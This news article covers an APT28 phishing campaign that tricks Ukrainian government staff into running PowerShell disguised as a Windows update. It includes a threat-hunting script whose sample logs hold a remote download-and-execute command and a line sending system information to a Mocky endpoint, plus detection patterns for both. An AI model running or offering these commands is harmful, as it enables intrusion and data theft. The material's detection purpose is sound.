Ukraine's CERT (Computer Emergency Response Team) has detected a new phishing campaign that targets Ukrainian government organizations with malicious emails purportedly containing a set of instructions on how to update their Windows systems to defend against cyberattacks.
The phishing emails impersonated system administrators of the targeted organizations using “@outlook.com” email addresses and employees’ real names, obtained through unknown means.
The email contains instructions in Ukrainian on how to update the system, along with a graphic image detailing the steps to execute a PowerShell command.
Once executed, this command downloads a PowerShell script onto the system that simulates a Windows update process while downloading a second PowerShell script in the background.
The second script is designed to collect system information, which is then sent to a Mocky service API via an HTTP request.
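The chain described above (a PowerShell download cradle, host discovery, and an HTTP post to a Mocky endpoint) lends itself to a script-block logging hunt. The following is an added detection example written for this article, not code from CERT-UA's report; the log lines, the 203.0.113.10 address and the `run.mocky.io` URL are constructed, and the Mocky domain pattern is an assumption to adjust for your environment.

```python
"""Flag PowerShell script-block log entries (Event ID 4104 style) that match
the campaign's pattern: a download cradle, host discovery, and a request to a
Mocky API endpoint. All sample log lines are constructed for this example."""
import re

# Constructed sample log lines: timestamp, host, event id, script text.
SAMPLE_LOGS = [
    "2023-05-01T10:02:11 HOST-01 4104 Write-Host 'Updating Windows...'; "
    "iex (New-Object Net.WebClient).DownloadString('http://203.0.113.10/update.ps1')",
    "2023-05-01T10:02:15 HOST-01 4104 $info = systeminfo; "
    "Invoke-RestMethod -Uri 'https://run.mocky.io/v3/EXAMPLE-ID' -Method Post -Body $info",
    "2023-05-01T10:05:00 HOST-02 4104 Get-ChildItem C:\\Temp | Remove-Item",
    "2023-05-01T10:06:30 HOST-03 4104 Invoke-WebRequest -Uri 'https://update.microsoft.com' -OutFile patch.msu",
]

DOWNLOAD_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|iwr|irm)\b", re.I)
DISCOVERY = re.compile(r"\b(systeminfo|Get-ComputerInfo|whoami|tasklist|Get-Process)\b", re.I)
EXFIL_ENDPOINT = re.compile(r"mocky\.io", re.I)  # assumed Mocky domain; adjust to your telemetry


def classify(script: str) -> set[str]:
    """Return the set of indicator tags found in one script-block log entry."""
    tags = set()
    if DOWNLOAD_CRADLE.search(script):
        tags.add("download_cradle")
    if DISCOVERY.search(script):
        tags.add("host_discovery")
    if EXFIL_ENDPOINT.search(script):
        tags.add("mocky_exfil")
    return tags


def hunt(lines):
    """Aggregate tags per host. A lone download is common and rated low; a
    download cradle combined with discovery or a Mocky request is rated high."""
    per_host = {}
    for line in lines:
        _ts, host, _event_id, script = line.split(" ", 3)
        tags = classify(script)
        if tags:
            per_host.setdefault(host, set()).update(tags)
    results = {}
    for host, tags in per_host.items():
        high = "download_cradle" in tags and bool(tags & {"host_discovery", "mocky_exfil"})
        results[host] = ("high" if high else "low", sorted(tags))
    return results
```

Run `hunt(SAMPLE_LOGS)`: HOST-01 is rated high, HOST-03 (a legitimate update download) low, and HOST-02 is not reported.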
The CERT team has attributed this campaign to the Russia-linked cyber-espionage group APT28 (aka Fancy Bear).
Last month, Ukrainian hacktivists released a data dump containing personal information and correspondence of Lieutenant Colonel Sergey Alexandrovich Morgachev, an officer of the Russian Main Intelligence Directorate of the General Staff of the Russian Army (GRU) and suspected leader of APT28 (the GRU Unit 26165).